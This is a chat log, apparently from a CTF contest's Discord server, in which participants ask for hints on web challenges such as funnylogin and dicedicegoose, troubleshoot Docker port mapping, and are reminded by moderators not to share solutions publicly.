assuming will breakdown = crash, because the middleware is implemented incorrectly and sends a response that auth failed (but will still proceed running the ping route, which also tries to send a response)
though as the process autorestarts it doesn't really matter (as long as you wait for the process to boot up)
oh,thanks
thanks
^
@loud geode might be worth documenting instructions for this ^
but it's just running adminbot.js code in headless chrome with puppeteer, you can npm i puppeteer and run it with a few line changes
yeah I'll update the admin bot repo and document this soon
hope you guys are ready for another 20 nodejs xss challs tomorrow 👀
i have my 0days ready <3
hell yeah
ready to bypass all filter 😄
20 nodejs....
Pwn 🔥 🔥 🔥
web's gonna be webbing
🕷️ 🕸️
Few seconds ...
why is the dicegoose challenge 1.5gb ??
🦦
as a beginner i really enjoyed dicedicegoose
I'll kms over this chall
hello please help me to run docker file
i built the docker image and ran it. it shows me that the container is listening on port 8080 but when i try to access the webpage, i get an error
i google yet
i just have trouble to access the webpage
-p 8080:8080
docker run my_image_name -it -p8080:8080
Move the args to after run
yes. i run this
```bash
sudo docker run -it -p 9090:9090 funylogin
```
you misspelt it
i have this output web/funnylogin listening on port 3000
Replace -p 9090:9090 with 3000:3000
ok
thank you very much !
More than 80 teams have already passed the funnylogin challenge and I can't figure out how to get the flag despite some pretty classic attempts.
I don't even know how to learn ... I'm giving up this contest, I must be really bad.
Is it possible to perform ssti in ejs latest version
I must be missing something with DDG. I'm able to get the flag printed out but it's not the right flag. Is the hint staring me right in the face?
skill issue bobi
I'm pretty sure a score over 100 is good, sooooooo shrug
uggghhhh got it.... Such a silly goose that goose was
LOL I was trying the same thing HAHA
same 😂
Dude I swear the SQL is not the vulnerable part
The admin decider doesn't change any sql
So how do I know bro
😭
but i cant get it
why doesn't the flag generator on goose work? it is encrypted to whaaaat
dicedicegooseeeeeeeeeeeeee
Then you must not be a beginner! I'm just starting out and I'm not getting anywhere despite my not-ridiculous knowledge.
who solved dicedicegoose
admin of funnylogin
create a ticket please
How does dicedicegoose have more solves than gpwaf lol 😭
It's not that bad
Hi everyone 😀
funny login down ...
@grave coral
oh you are right.. funnylogic down
we need hints for these challenges😭
ci is spinning
helps some hints on funnylogic or crypto/winter please?
we are not providing hints to challenges with many solves, sorry
Hey, I am totally newb. I am doing this after more than 6 months so I am totally blank. Any help I could get at all?
Literally, I have no idea. I am doing web currently. Tried alot of different approaches but got nothing in any challenge.
Hey)
how's it going?
hey
it's pretty brutal I think
did you do web first?
no, and you?
nope
did you do the calculator or the login?
nothing at all
we can't even figure it out
Omg, this gpwaf task is really good
Like, its fun
And easy, if you know, what you need to do
gpts are dumb, 4sure
sqli data exfiltration with sqlite3 or ..... ?
einh?
difficulty? still solveable?
Surely, I'd say it is on the easy side
is there some specific set of moves?
nice, I'll try to look at that. After finishing scripting on funnylogic. I'm stuck at crypto
I am not sure you need a script for funnylogic, cause I presume you want to bruteforce it, which is not allowed.
you don't
Yeah, I also dont think so
hmm.. I think I know what you meant..
I meant only that
Idk what for a script you possibly can write here, so I just presumed.
yeah I'm like already in the team
send the invite
so you mean that i can get the flag without bruteforce right ?
yeah ik
do you need tools or just plain logic will do?
I dont think you need tools to solve any of the web chals
funnylogin is irritating for me 😬
Is There A Trick or Something?
Don't discuss details of challenges in public please!
funny login is doable!
keep trying!
guys how to encode history in dicedicegoose???
how to find the second part of flag??
admin?
play game normaly
how??ahah i can't beat it in 9 steps
it is impossible and i can't find this number in burp
it is js bro, possible just focus
admin?
could we get increased instance time for safestlist?
Why are you guys just discussing how to solve the problems in public?
Open a ticket instead of DM.
Whats the flag for web guys
🤨
bro
real
@mortal stirrup 💀
Mfw fake flag got blocked by server rules
tried many things cant figure out
We should block only real flags so you can bruteforce all solutions
can we bruteforce in funnylogin like sqlmap?
No
then how are we supposed to solve it😭
the description says no bruteforce
that's all i know
i have lost my sanity keeping up with the goose
💀
obviously
how else will we get flags smh
everyone please don't discuss solutions
Hate to say it guys, but if you're not finding the solution with your fingers -- maybe you should use your brain.
This is general advice. Slow down and carefully consider what you see.
sql >>> nosql
why use brain when use gpt
Because if you don't use your brain then gpt will become stupid
The bruteforce really isn't feasible anyway. Do the math on req/s and # req needed. It's not good
CTF will be over
nah bro just scale it
Could anyone give me a little hint for funnylogin? I'm getting burned out on this challenge
Hint: you can solve it in a single request
ask yourself what am i pwning and why is js so cringe
😬
Maybe you can draw inspiration from the epic "wat" talk.
does funnylogin have anything to do with crypto cuz its under the category web
get/post request?
flag request
just ask it nicely
everybody keeps trying to hack everything but being kind comes a far way
@oak topaz sol for another-csp
(open tkt)
This stuff is frustrating at times, but it's how you respond that will make the difference.
I sent DM you
its a joke ._.
so is my ctf skills atp
to anyone stuck on the challenge the flag starts with ||dice{ ||
Points at last, thanks to DiceDiceGoose! 🥲
how did u do it
i spent my whole day running after da goose
Did you read the code???
that was very long
bruh
Feel free to dm me the key points of information you learned from there 🙂
Hint: You can ask for the solutions without receiving useless jokes or risking violating the rules after the contest is finished.
can i ask one questino about the first web chall? just so my pc doesnt get burned lol ty
question*
(like legit pc getting frozen since it potato pc bcs of what i am doing)
its
which chall? funnylogin?
no, dicedicegoose
shi, is there any easier challs (web)
is it close to real world at least? and not guessy as hell
its easy just hack it
sry cant help with this one :/
thanks, didnt think about that haha
okay, no problem :) ty anyways
can someone help with funny login?
yea dont bruteforce it
on your local docker? or ctf server?
okay on ctf is weird maybe write a ticket?
will try few more times, then mb will do it
Can I use burp suite intruder to solve funnylogin?
Is that a brute force tool? If so no
OK, I'll try another way to solve.
Thanks
If it writes "Nice try" I'm on the right way?
I’m stuck at funnylogin for like 6 hours now 💀
me for a whole day 🙂
since the CTF started
ok, i just did funnylogin but didnt realise how it worked xd just one part. can i dm someone just to explain it rq? :D
ty
I just started 7-8 hours ago
dm me
cant bcs of ur discord privacy, do u mind dming me?
yeah not sure if its only for stuff being broken etc. or i can use it for that
Lol, just make a ticket, no need to discuss the solutions with people during an actively running CTF :p
Plus your question is relating to stuff potentially being broken, who'd know that better than the admins 😉
it's not, i just dont realise why it worked
but sure my bad
Oh I misread 😂, eh, no harm not making a ticket anyways :3
@cerulean spruce bot in safestlist was such a pain..
already solved
no fb on #first-bloods that's the issue lmao
Thanks! It gave me the right inspiration 🙂
No first blood??
my solution was that complex that it broke the scoreboard lol
Not surprised. I looked at that one 🙂
could i get a hint for funny login?
@torn palm Not related to the challenges or the CTF but I think I've come across your blog a time or two.
i been throwin myself against it for a while no luck
I walked away from it for a bit. Still haven't come up with any ideas and people saying it's straight forward doesn't help 😛
Oh HRM. I am not sure which one. Usually I've written blogs for work and those haven't lived as much as I'd like. The one still up is https://www.droidsec.org/news
But I will make a new one soon
I could be remembering wrong too. My old man brain does that from time to time.... Your avatar looked familiar. Maybe it was another CTF
That one was intended to be a group thing but no one ever contributed
funnylogin down ?
Think so
investigating..